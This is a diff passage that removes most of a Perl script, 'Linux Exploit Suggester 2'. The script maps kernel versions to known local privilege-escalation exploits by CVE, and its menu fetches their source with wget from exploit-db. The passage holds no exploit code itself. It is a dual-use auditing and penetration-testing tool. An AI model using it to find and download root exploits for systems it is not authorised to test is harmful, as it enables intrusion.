-    print "/ Exit: \e[00;33m^c\e[00m)\n";
-    print "  Select exploits to download: ";
-
-    while (1) {
-        my $input = <STDIN>;
-        $input =~ s/\s+//g;
-
-        if ($input =~ /^a$/) {
-            my @selected = ();
-            for (my $i=1; $i <= scalar @applicable; $i++) {
-               push(@selected, $i);
-            }
-            download_exploits(\@selected, \@applicable);
-            last;
-        }
-        elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
-            my @selected = uniq(split(',', $input));
-            @selected = sort {$a <=> $b} @selected;
-            if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
-                download_exploits(\@selected, \@applicable);
-                last;
-            }
-            else {
-               print "  \e[00;31mInput is out of range.\e[00m Select exploits to download: ";
-            }
-        }
-        else {
-            print "  \e[00;31mInvalid input.\e[00m Select exploits to download: ";
-        }
-    }
-};
-exit;
-
-######################
-## extra functions  ##
-######################
-
-sub get_kernel {
-    my $khost = '';
-
-    if ( exists $opts{k} ) {
-        $khost = $opts{k};
-    }
-    else {
-        $khost = `uname -r |cut -d"-" -f1`;
-        chomp $khost;
-    }
-
-    if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
-        print "  \e[00;31mSpecified kernel is in the wrong format\e[00m\n";
-        print "  Try a kernel format like this: 3.2.0\n\n";
-        exit;
-    }
-
-    # partial kernels might be provided by the user,
-    # such as '2.4' or '2.6.'
-    my $is_partial = $khost =~ /^\d+\.\d+\.\d?/ ? 0 : 1;
-    return ( $khost, $is_partial );
-}
-
-sub download_exploits {
-    my ($sref, $aref) = @_;
-    my @selected = @{ $sref };
-    my @applicable = @{ $aref };
-    my $exploit_base = "www.exploit-db.com/exploits";
-    my $download_base = "https://www.exploit-db.com/raw/";
-    print "\n";
-
-    foreach my $num (@selected) {
-        my $mil = $applicable[$num-1]{mil};
-        next if (!defined $mil);
-        my ($exploit_num) = ($mil =~ /^.*\/([1-9][0-9]*)\/?$/);
-        
-        if ($exploit_num && index($mil, $exploit_base) != -1) {
-            my $url = $download_base . $exploit_num;
-            my $file = "exploit_$applicable[$num-1]{key}";
-            print "  Downloading \e[00;33m$url\e[00m -> \e[00;33m$file\e[00m\n";
-            system "wget $url -O $file > /dev/null 2>&1";
-        }
-        else {
-            print "  No exploit code available for \e[00;33m$applicable[$num-1]{key}\e[00m\n"; 
-        }
-    }
-    print "\n";
-}
-
-sub uniq {
-    my %seen;
-    grep !$seen{$_}++, @_;
-}
-
-sub usage {
-print_banner();
-print "  \e[00;35mUsage:\e[00m $0 [-h] [-k kernel] [-d]\n\n";
-print "  \e[00;33m[\e[00m\e[00;31m-h\e[00m\e[00;33m]\e[00m Help (this message)\n";
-print "  \e[00;33m[\e[00m\e[00;31m-k\e[00m\e[00;33m]\e[00m Kernel number (eg. 2.6.28)\n";
-print "  \e[00;33m[\e[00m\e[00;31m-d\e[00m\e[00;33m]\e[00m Open exploit download menu\n\n";
-
-print "  You can also provide a partial kernel version (eg. 2.4)\n";
-print "  to see all exploits available.\n\n";
-}
-
-sub print_banner {
-print "\n\e[00;33m  #############################\e[00m\n";
-print "\e[1;31m    Linux Exploit Suggester $VERSION\e[00m\n";
-print "\e[00;33m  #############################\e[00m\n\n";
-}
-
-sub get_exploits {
-  return (
-    'w00t' => {
-        vuln => [
-            '2.4.10', '2.4.16', '2.4.17', '2.4.18',
-            '2.4.19', '2.4.20', '2.4.21',
-        ]
-    },
-    'brk' => {
-        vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
-    },
-    'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
-
-    'elflbl' => {
-        vuln => ['2.4.29'],
-        mil  => 'http://www.exploit-db.com/exploits/744',
-    },
-
-    'elfdump'      => { vuln => ['2.4.27'] },
-    'elfcd'        => { vuln => ['2.6.12'] },
-    'expand_stack' => { vuln => ['2.4.29'] },
-
-    'h00lyshit' => {
-        vuln => [
-            '2.6.8',  '2.6.10', '2.6.11', '2.6.12',
-            '2.6.13', '2.6.14', '2.6.15', '2.6.16',
-        ],
-        cve => '2006-3626',
-        mil => 'http://www.exploit-db.com/exploits/2013',
-    },
-
-    'kdump' => { vuln => ['2.6.13'] },
-    'km2'   => { vuln => [ '2.4.18', '2.4.22' ] },
-    'krad' =>
-      { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
-
-    'krad3' => {
-        vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
-        mil => 'http://exploit-db.com/exploits/1397',
-    },
-
-    'local26' => { vuln => ['2.6.13'] },
-    'loko'    => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
-
-    'mremap_pte' => {
-        vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
-        mil => 'http://www.exploit-db.com/exploits/160',
-    },
-
-    'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
-    'ong_bak'  => { vuln => ['2.6.5'] },
-    'ptrace' =>
-      { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
-    'ptrace_kmod' => {
-        vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
-        cve  => '2007-4573',
-    },
-    'ptrace_kmod2' => {
-        vuln => [
-            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
-            '2.6.32', '2.6.33', '2.6.34',
-        ],
-        alt => 'ia32syscall,robert_you_suck',
-        mil => 'http://www.exploit-db.com/exploits/15023',
-        cve => '2010-3301',
-    },
-    'ptrace24' => { vuln => ['2.4.9'] },
-    'pwned'    => { vuln => ['2.6.11'] },
-    'py2'      => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
-    'raptor_prctl' => {
-        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
-        cve  => '2006-2451',
-        mil => 'http://www.exploit-db.com/exploits/2031',
-    },
-    'prctl' => {
-        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
-        mil => 'http://www.exploit-db.com/exploits/2004',
-    },
-    'prctl2' => {
-        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
-        mil => 'http://www.exploit-db.com/exploits/2005',
-    },
-    'prctl3' => {
-        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
-        mil => 'http://www.exploit-db.com/exploits/2006',
-    },
-    'prctl4' => {
-        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
-        mil => 'http://www.exploit-db.com/exploits/2011',
-    },
-    'remap'      => { vuln => ['2.4'] },
-    'rip'        => { vuln => ['2.2'] },
-    'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
-    'uselib24' => {
-        vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
-    },
-    'newsmp'   => { vuln => ['2.6'] },
-    'smpracer' => { vuln => ['2.4.29'] },
-    'loginx'   => { vuln => ['2.4.22'] },
-    'exp.sh'   => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
-    'vmsplice1' => {
-        vuln => [
-            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
-            '2.6.23', '2.6.24', '2.6.24.1',
-        ],
-        alt => 'jessica biel',
-        cve => '2008-0600',
-        mil => 'http://www.exploit-db.com/exploits/5092',
-    },
-    'vmsplice2' => {
-        vuln => [ '2.6.23', '2.6.24' ],
-        alt  => 'diane_lane',
-        cve  => '2008-0600',
-        mil  => 'http://www.exploit-db.com/exploits/5093',
-    },
-    'vconsole' => {
-        vuln => ['2.6'],
-        cve  => '2009-1046',
-    },
-    'sctp' => {
-        vuln => ['2.6.26'],
-        cve  => '2008-4113',
-    },
-    'ftrex' => {
-        vuln => [
-            '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
-            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
-        ],
-        cve => '2008-4210',
-        mil => 'http://www.exploit-db.com/exploits/6851',
-    },
-    'exit_notify' => {
-        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
-        mil => 'http://www.exploit-db.com/exploits/8369',
-    },
-    'udev' => {
-        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
-        alt  => 'udev <1.4.1',
-        cve  => '2009-1185',
-        mil => 'http://www.exploit-db.com/exploits/8478',
-    },
-
-    'sock_sendpage2' => {
-        vuln => [
-            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
-            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
-            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
-            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
-            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
-            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
-            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
-            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
-            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
-            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
-            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
-        ],
-        alt => 'proto_ops',
-        cve => '2009-2692',
-        mil => 'http://www.exploit-db.com/exploits/9436',
-    },
-
-    'sock_sendpage' => {
-        vuln => [
-            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
-            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
-            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
-            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
-            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
-            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
-            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
-            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
-            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
-            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
-            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
-        ],
-        alt => 'wunderbar_emporium',
-        cve => '2009-2692',
-        mil => 'http://www.exploit-db.com/exploits/9435',
-    },
-    'udp_sendmsg_32bit' => {
-        vuln => [
-            '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',
-            '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12',
-            '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
-            '2.6.19',
-        ],
-        cve => '2009-2698',
-        mil =>
-          'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
-    },
-    'pipe.c_32bit' => {
-        vuln => [
-            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
-            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
-            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
-            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
-            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
-            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
-            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
-            '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
-            '2.6.29', '2.6.30', '2.6.31',
-        ],
-        cve => '2009-3547',
-        mil =>
-          'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
-    },
-    'do_pages_move' => {
-        vuln => [
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31',
-        ],
-        alt => 'sieve',
-        cve => '2010-0415',
-        mil => 'Spenders Enlightenment',
-    },
-    'reiserfs' => {
-        vuln => [
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
-        ],
-        cve => '2010-1146',
-        mil => 'http://www.exploit-db.com/exploits/12130',
-    },
-    'can_bcm' => {
-        vuln => [
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        cve => '2010-2959',
-        mil => 'http://www.exploit-db.com/exploits/14814',
-    },
-    'rds' => {
-        vuln => [
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
-            '2.6.34', '2.6.35', '2.6.36',
-        ],
-        mil => 'http://www.exploit-db.com/exploits/15285',
-        cve => '2010-3904',
-    },
-    'half_nelson1' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        alt => 'econet',
-        cve => '2010-3848',
-        mil => 'http://www.exploit-db.com/exploits/17787',
-    },
-    'half_nelson2' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        alt => 'econet',
-        cve => '2010-3850',
-        mil => 'http://www.exploit-db.com/exploits/17787',
-    },
-    'half_nelson3' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        alt => 'econet',
-        cve => '2010-4073',
-        mil => 'http://www.exploit-db.com/exploits/17787',
-    },
-    'caps_to_root' => {
-        vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
-        cve  => 'n/a',
-        mil => 'http://www.exploit-db.com/exploits/15916',
-    },
-    'american-sign-language' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        cve => '2010-4347',
-        mil => 'http://www.securityfocus.com/bid/45408',
-    },
-    'pktcdvd' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
-            '2.6.36',
-        ],
-        cve => '2010-3437',
-        mil => 'http://www.exploit-db.com/exploits/15150',
-    },
-    'video4linux' => {
-        vuln => [
-            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
-            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
-            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
-            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
-        ],
-        cve => '2010-3081',
-        mil => 'http://www.exploit-db.com/exploits/15024',
-    },
-    'memodipper' => {
-        vuln => [
-            '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
-            '3.0.5',  '3.0.6', '3.1.0',
-        ],
-        cve => '2012-0056',
-        mil => 'http://www.exploit-db.com/exploits/18411',
-    },
-    'semtex' => {
-        vuln => [
-            '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
-            '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6', '3.1.0',
-        ],
-        cve => '2013-2094',
-        mil => 'http://www.exploit-db.com/exploits/25444',
-    },
-    'perf_swevent' => {
-        vuln => [
-            '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
-            '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
-            '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
-            '3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
-            '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
-            '3.8.8', '3.8.9',
-        ],
-        cve => '2013-2094',
-        mil => 'http://www.exploit-db.com/exploits/26131',
-    },
-    'msr' => {
-        vuln => [
-            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
-            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
-            '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
-            '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
-            '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6',
-            '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  '3.5.0',  '3.6.0',
-            '3.7.0',  '3.7.6',
-        ],
-        cve => '2013-0268',
-        mil => 'http://www.exploit-db.com/exploits/27297',
-    },
-    'timeoutpwn' => {
-        vuln => [
-            '3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.9', 
-            '3.9.0',  '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
-            '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.5',  '3.8.6',  
-            '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', '3.11.0',
-            '3.12.0', '3.13.0', '3.13.1'
-        ],
-        cve => '2014-0038',
-        mil => 'http://www.exploit-db.com/exploits/31346',
-    },
-    'rawmodePTY' => {
-        vuln => [
-            '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
-            '2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
-        ],
-        cve => '2014-0196',
-        mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
-    },
-    'overlayfs' => {
-        vuln => [
-            '3.13.0', '3.16.0', '3.19.0'
-        ],
-        cve => '2015-8660',
-        mil => 'http://www.exploit-db.com/exploits/39230',
-    },
-    'pp_key' => {
-        vuln => [
-			'3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.1',  
-            '3.8.2',  '3.8.3',  '3.8.4',  '3.8.5',  '3.8.6',  '3.8.7',  
-            '3.8.8',  '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', 
-            '3.11.0', '3.12.0', '3.13.0', '3.13.1'
-        ],
-        cve => '2016-0728',
-        mil => 'http://www.exploit-db.com/exploits/39277',
-    },
-    'dirty_cow' => {
-        vuln => [
-            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', 
-			'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', 
-            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', 
-            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  
-            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  
-            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0', 
-            '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0', 
-            '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0',  '4.1.0', 
-            '4.2.0',  '4.3.0',  '4.4.0',  '4.5.0',  '4.6.0',  '4.7.0'
-        ],
-        cve => '2016-5195',
-        mil => 'http://www.exploit-db.com/exploits/40616',
-    },
-    'af_packet' => {
-        vuln => ['4.4.0' ],
-        cve => '2016-8655',
-        mil => 'http://www.exploit-db.com/exploits/40871',
-    },
-    'packet_set_ring' => {
-        vuln => ['4.8.0' ],
-        cve => '2017-7308',
-        mil => 'http://www.exploit-db.com/exploits/41994',
-    },
-    'clone_newuser' => {
-        vuln => [
-            '3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1', 
-            '3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
-        ],
-        cve => 'N\A',
-        mil => 'http://www.exploit-db.com/exploits/38390',
-    },
-    'get_rekt' => {
-        vuln => [
-            '4.4.0', '4.8.0', '4.10.0', '4.13.0'
-        ],
-        cve => '2017-16695',
-        mil => 'http://www.exploit-db.com/exploits/45010',
-    },
-    'exploit_x' => {
-        vuln => [
-            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
-            '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
-            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
-            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',
-            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',
-            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0',
-            '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
-            '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0',  '4.1.0',
-            '4.2.0',  '4.3.0',  '4.4.0',  '4.5.0',  '4.6.0',  '4.7.0'
-        ],
-        cve => '2018-14665',
-        mil => 'http://www.exploit-db.com/exploits/45697',
-    },
-  );
-}
-
-__END__
-=head1 NAME
-
-linux_exploit_suggester-2.pl - A local exploit suggester for linux
-
-=head1 DESCRIPTION
-
-This perl script will enumerate the possible exploits available for a given kernel version
-
-=head1 USAGE
-
-[-h] Help (this message)
-[-k] Kernel number (eg. 2.6.28)
-[-d] Open exploit download menu
-
-You can also provide a partial kernel version (eg. 2.4)
-to see all exploits available.
-
-=head1 AUTHOR
-
-Jonathan Donas (c) 2019
-
-=head1 CHANGELOG
-
-27-03-2019 added exploit download menu
-
-31-12-2018 added exploit_x
-
-30-11-2018 added get_rekt
-
-15-04-2018 added clone_newuser
-
-23-11-2017 added packet_set_ring
-
-05-11-2017 added af_packet
-
-28-04-2017 added dirty_cow
-
-25-07-2016 added overlayfs and pp_key
-
-=cut
-
-=head1 LICENSE
-
- Linux Exploit Suggester 2
-
- This program is free software; you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation; either version 2 of the License, or
- (at your option) any later version.
-
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- GNU General Public License for more details.
-        
- You should have received a copy of the GNU General Public License along
- with this program; if not, write to the Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
-=cut